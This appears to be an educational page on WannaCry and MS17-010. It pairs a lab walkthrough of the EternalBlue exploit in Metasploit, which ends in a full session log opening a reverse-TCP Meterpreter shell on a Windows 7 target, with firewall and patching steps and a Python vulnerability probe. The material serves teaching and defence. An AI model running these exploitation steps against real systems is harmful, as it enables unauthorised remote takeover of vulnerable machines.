Which vulnerability did WannaCry mainly exploit?
Background and vulnerability overview
After a host is infected by this ransomware it displays the ransom dialog shown below, stating the extortion demand and asking the user for Bitcoin. Nearly every kind of important file on the host (photos, images, documents, archives, audio, video, executables and so on) is encrypted, and the encrypted files are renamed with a uniform ".WNCRY" extension. At the time the security industry had no effective way to undo the malicious encryption: once a host had been compromised, removing the ransomware (usually by reinstalling the operating system) did not bring the data back, and without a backup the encrypted files could not be recovered.
[Screenshot: the WannaCry ransom dialog]
Main vulnerability exploited:
On 12 May 2017 the WannaCry worm broke out worldwide through the MS17-010 vulnerability and infected a large number of computers. After infecting a machine the worm drops the ransomware component, which encrypts large numbers of files on the computer.
WannaCry spreads through a vulnerability in the Windows SMBv1 server, reached over TCP port 445, and has worm properties: it copies itself and actively propagates to other reachable hosts.
"EternalBlue" is the name of the exploit tool leaked from the NSA, not the name of the malware. It refers to the leaked exploit for the dangerous MS17-010 vulnerability; the WannaCry ransomware used it to spread, and other malware can spread through the same vulnerability, so patching the system is mandatory.
Demonstrating the EternalBlue exploit (MS17-010):
1. Find the target's IP address (in the session below the target is 172.16.35.139 and the attacker is 172.16.35.136)
2. Exploit with msf (the msfconsole session for these steps is reproduced at the end of this page)
(1) Search for the EternalBlue exploit module
(2) Set the IP addresses (RHOSTS for the target, LHOST for the attacker)
(3) Run the exploit
(4) The exploit succeeds and a Meterpreter session opens
Defensive measures:
Blocking inbound TCP 445 in the host firewall (below) keeps the worm from reaching the SMB service, but it is a mitigation, not a fix: the vulnerable SMBv1 server is still running behind the rule, and file and printer sharing to that host stops working. Install the MS17-010 security update (Microsoft also published it for Windows XP and Server 2003 after the outbreak) and disable SMBv1 where nothing depends on it; keep the firewall rule for hosts that cannot be patched yet.
Procedure for Windows 7, 8 and 10
1. Open Control Panel > System and Security > Windows Firewall and click "Turn Windows Firewall on or off" on the left.
2. Select "Turn on Windows Firewall" and click OK.
3. Click "Advanced settings".
4. Click "Inbound Rules", then "New Rule".
5. Choose "Port", then Next.
6. Choose "Specific local ports", enter 445, then Next.
7. Choose "Block the connection", then Next.
8. Under Profile, tick all three (Domain, Private, Public), then Next.
9. Give the rule any name and click Finish.
Procedure for Windows XP
1. Open Control Panel > Security Center > Windows Firewall and select "On".
2. Click Start > Run, type cmd, press OK and run the following three commands: net stop rdr, net stop srv, net stop netbt
These stop the workstation redirector, the SMB server driver (srv.sys, the component that MS17-010 fixes) and NetBIOS over TCP/IP, but only until the next reboot, when the services start again; treat this as a stopgap until the update is installed.
msfconsole session for demonstration steps (1) to (4) above (attacker 172.16.35.136, target 172.16.35.139):

msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > search eternal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.35.137    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.35.136
lhost => 172.16.35.136
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.35.139
rhosts => 172.16.35.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 172.16.35.136:4444
[*] 172.16.35.139:445 - Executing automatic check (disable AutoCheck to override)
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.35.139:445 - The target is vulnerable.
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445 - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.35.139:445 - Connecting to target for exploitation.
[+] 172.16.35.139:445 - Connection established for exploitation.
[+] 172.16.35.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.35.139:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.35.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.35.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.35.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.35.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.35.139:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.35.139:445 - Sending all but last fragment of exploit packet
[*] 172.16.35.139:445 - Starting non-paged pool grooming
[+] 172.16.35.139:445 - Sending SMBv2 buffers
[+] 172.16.35.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.35.139:445 - Sending final SMBv2 buffers.
[*] 172.16.35.139:445 - Sending last fragment of exploit packet!
[*] 172.16.35.139:445 - Receiving response from exploit packet
[+] 172.16.35.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.35.139:445 - Sending egg to corrupted connection.
[*] 172.16.35.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.35.139
[*] Meterpreter session 1 opened (172.16.35.136:4444 -> 172.16.35.139:49159) at 2022-07-21 21:26:30 +0800
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer        : WIN-50HM5UIKP60
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:78:c7:d1
MTU          : 1500
IPv4 Address : 172.16.35.139
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c4d:f99f:5511:8da8
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:ac10:238b
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
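The automatic check in the session above ("Using auxiliary/scanner/smb/smb_ms17_010 as check ... Host is likely VULNERABLE to MS17-010!") and the mitigations in the defensive section (blocking 445, disabling SMBv1) can both be verified without Metasploit. The script below is an added example written for this page, not code from the page or from the Metasploit project. It replays the same probe the scanner relies on: an anonymous SMBv1 session, a tree connect to IPC$, then a TRANS PeekNamedPipe request on FID 0, and classifies the NT status the server returns (STATUS_INSUFF_SERVER_RESOURCES means the unpatched srv.sys, STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED means a patched one). The header flag values, dialect list and the fake "Windows 2000" native-OS strings are assumptions copied from the commonly used form of this check; the fallback target address is the lab target from the session above. A refused connection, a rejected SMBv1 negotiate and a rejected null session each get their own verdict, so the same script shows whether the port-445 rule or disabling SMBv1 took effect.

```python
#!/usr/bin/env python3
"""MS17-010 probe: replays the check behind Metasploit's smb_ms17_010 scanner.
Anonymous SMBv1 session -> tree connect to IPC$ -> TRANS PeekNamedPipe on FID 0.
Illustrative code written for this page; the protocol constants below are
assumptions taken from the common form of this check, not from the page."""
import socket
import struct
import sys

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched srv.sys
STATUS_INVALID_HANDLE = 0xC0000008            # patched
STATUS_ACCESS_DENIED = 0xC0000022             # patched
SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75


def smb_header(command, flags2, tid=0, uid=0, pid=0x4B2F, mid=0x5EC5):
    """32-byte SMBv1 header; flags 0x18 = canonical paths + case-insensitive."""
    return (b"\xffSMB" + struct.pack("<BIBH", command, 0, 0x18, flags2)
            + b"\x00" * 12                       # PIDHigh, SecuritySignature, Reserved
            + struct.pack("<HHHH", tid, pid, uid, mid))

def netbios(smb):
    """NetBIOS session service framing: 0x00 + 3-byte big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

def negotiate_request():
    dialects = b"".join(b"\x02" + d + b"\x00" for d in
                        (b"LANMAN1.0", b"LM1.2X002", b"NT LANMAN 1.0", b"NT LM 0.12"))
    return netbios(smb_header(SMB_COM_NEGOTIATE, 0x2801) + b"\x00"
                   + struct.pack("<H", len(dialects)) + dialects)

def session_setup_request():
    # 13 words: no AndX, MaxBuffer 0xFFDF, MaxMpx 2, VC 1, no session key,
    # zero-length ANSI/Unicode passwords (null session), capabilities 0x40.
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFDF, 2, 1, 0, 0, 0, 0, 0x40)
    data = b"\x00" + b".\x00" + b"Windows 2000 2195\x00" + b"Windows 2000 5.0\x00"
    return netbios(smb_header(SMB_COM_SESSION_SETUP_ANDX, 0x2001) + b"\x0d" + words
                   + struct.pack("<H", len(data)) + data)

def tree_connect_request(ip, uid):
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)   # no AndX, flags 0, password len 1
    data = b"\x00" + f"\\\\{ip}\\IPC$".encode() + b"\x00" + b"?????\x00"
    return netbios(smb_header(SMB_COM_TREE_CONNECT_ANDX, 0x2001, uid=uid) + b"\x04"
                   + words + struct.pack("<H", len(data)) + data)

def peek_named_pipe_request(tid, uid):
    # SMB_COM_TRANSACTION: 14 fixed words + 2 setup words (0x23 = PeekNamedPipe, FID 0).
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, 0x4A, 0, 0x4A, 2, 0)
    return netbios(smb_header(SMB_COM_TRANSACTION, 0x2801, tid=tid, uid=uid) + b"\x10"
                   + words + struct.pack("<HH", 0x23, 0) + b"\x07\x00" + b"\\PIPE\\\x00")

def nt_status(msg):
    """NT status of a NetBIOS-framed SMB response: header offset 5, little-endian."""
    return struct.unpack_from("<I", msg, 4 + 5)[0]

def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "PATCHED"
    return "UNKNOWN"

def recv_smb(sock):
    """Read one NetBIOS-framed message (only one request is in flight at a time)."""
    buf = b""
    while len(buf) < 4 or len(buf) < 4 + int.from_bytes(buf[1:4], "big"):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def check_host(ip, port=445, timeout=5.0):
    """Return (verdict, nt_status). Failure modes map to verdicts, not exceptions."""
    try:
        with socket.create_connection((ip, port), timeout=timeout) as s:
            s.sendall(negotiate_request())
            resp = recv_smb(s)
            if nt_status(resp) != 0 or struct.unpack_from("<H", resp, 4 + 33)[0] == 0xFFFF:
                return "SMB1_REFUSED", nt_status(resp)   # SMBv1 off or no dialect accepted
            s.sendall(session_setup_request())
            resp = recv_smb(s)
            if nt_status(resp) != 0:
                return "NULL_SESSION_REFUSED", nt_status(resp)
            uid = struct.unpack_from("<H", resp, 4 + 28)[0]   # UID assigned by the server
            s.sendall(tree_connect_request(ip, uid))
            resp = recv_smb(s)
            if nt_status(resp) != 0:
                return "IPC_REFUSED", nt_status(resp)
            tid = struct.unpack_from("<H", resp, 4 + 24)[0]   # TID of the IPC$ tree
            s.sendall(peek_named_pipe_request(tid, uid))
            status = nt_status(recv_smb(s))
            return classify(status), status
    except ConnectionRefusedError:
        return "PORT_CLOSED", None        # 445 not listening or actively rejected
    except OSError:                       # timeout, reset, or SMBv1 listener gone
        return "NO_RESPONSE", None

if __name__ == "__main__":
    verdict, status = check_host(sys.argv[1] if len(sys.argv) > 1 else "172.16.35.139")
    print(verdict if status is None else f"{verdict} (NT status 0x{status:08X})")
```

Run it as `python3 <script> 172.16.35.139` against a host you are authorized to test; the probe never touches the kernel pool, so it does not risk the crash the real exploit can cause, but the null session does appear as an anonymous network logon in the target's Security log. Run it once before and once after applying the mitigations: a vulnerable lab host reports VULNERABLE, the same host with the inbound 445 rule reports PORT_CLOSED or NO_RESPONSE, a host with SMBv1 disabled reports SMB1_REFUSED or NO_RESPONSE, and only a host with the MS17-010 update installed reports PATCHED.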